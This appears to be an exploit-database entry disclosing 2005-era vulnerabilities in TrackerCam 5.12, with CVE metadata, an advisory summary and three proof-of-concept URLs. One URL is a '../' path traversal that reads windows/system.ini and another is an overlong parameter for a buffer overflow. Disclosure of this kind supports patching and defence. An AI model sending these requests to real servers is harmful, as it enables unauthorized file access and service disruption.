TrackerCam 5.12 - 'ComGetLogFile.php3?fm' Traversal Arbitrary File Access
Author: Luigi Auriemma
type: webapps
platform: php
port:
date_added: 2005-02-18
date_updated: 2013-05-01
verified: 1
codes: CVE-2005-0479;OSVDB-13955
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/12592/info
TrackerCam is prone to multiple remote vulnerabilities, including buffer-overflow issues, a directory-traversal issue, an information-disclosure issue, an HTML-injection issue, and denial-of-service issues.
A remote attacker could exploit these issues to execute arbitrary code, obtain potentially sensitive information, launch phishing attacks or steal cookie based authentication credentials, and deny service to legitimate users.
http://www.example.com:8090/MessageBoard/messages.php?aaaaaaaaaaa[256]aaaa
http://www.example.com:8090/tuner/ComGetLogFile.php3?fn=../../../../windows/system.ini
http://www.example.com:8090/tuner/ComGetLogFile.php3?fn=Eye2005_02.log